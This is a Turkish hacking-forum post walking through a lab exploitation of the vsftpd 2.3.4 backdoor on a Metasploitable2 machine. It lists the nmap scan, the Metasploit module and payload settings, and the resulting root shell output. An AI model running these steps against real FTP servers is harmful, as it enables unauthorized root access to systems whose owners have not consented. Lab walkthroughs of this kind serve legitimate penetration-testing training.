FTP Sunucu Hackleme (NMAP) (1 Viewer)

Kirito1337

B0RU70
Joined
Feb 27, 2017
Credits
0
Rating - 0%
View hidden content is available for registered users!

Bu konuda, FTP protokolü üzerinde ki "vsftpd 2.3.4" uygulamasını exploit ederek hedef sistemde root yetkisine çıkmayı göstereceğim.

Sızma Testi senaryosunu gerçekleştirirken, laborotatuvar ortamı olarak, "métasploitable2-Linux" sistemini kullandım.

Artık anlatıma geçelim.

Öncelikle hedef sunucumuzda bir nmap ile port taraması yaparak keşif çalışmamızı yapalım.

"nmap -sV 192.168.127.130" hedef sunucumuzun İP adresidir.


Tarama sonucunda gördüğünüz gibi, FTP protokolü üzerinde, "vsftpd 2.3.4" uygulaması çalışmakta.

Biz de bunu kullanarak hedef sunucuya sızabiliriz.

Açalım bakalım, métasploit framework’ ümüzü

"msfconsole" diyerek açıyoruz.


search vsftpd" komutunu girerek explotimizi aradık.

"use exploit/unix/ftp/vsftpd_234_backdoor" exploitimize giriyoruz.

"show payloads" komutu ile exploite uygun payloadları arıyoruz ve "cmd/unix/interact" payloadını seçiyoruz.


ardından, "show options" komutunu girerek, genel ayarları yapıyoruz.

"set RHOST 192.168.127.130" ve "set RPORT 21" bilgilerini girerek exploiti çalıştırıyoruz.


exploit sonucunda, hedef sistemde root yetkisi kazanmış olduk.

UID: uid=0(root) gid=0(root)

görüldüğü üzere, "command shell session 1 opened" 1 shell oturumu açıldı. Artık linux komutlarıı çalıştırabiliriz. Gerisi
size kalmış.

"whoami" komutunu girdim, "root" çıktısını aldım. Bu demek oluyorki sen root kullanıcısısın artık.

"uname -a" komutu ile hedef sistemin kernel sürümünü öğrendim.

"ls" komutu ile bulunduğum dizinin dosyalarını listeledim. Ve çok şey yapabiliriz.
SON ;)


nmap-wordpress-script-scanning.png
 

Users who are viewing this thread

Top